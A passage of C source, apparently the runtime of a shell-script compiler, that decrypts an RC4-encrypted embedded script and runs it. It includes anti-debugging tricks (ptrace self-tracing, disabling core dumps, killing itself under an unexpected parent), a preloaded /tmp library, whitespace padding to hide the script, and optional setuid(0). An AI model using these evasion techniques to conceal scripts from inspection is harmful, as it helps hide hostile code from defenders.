    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
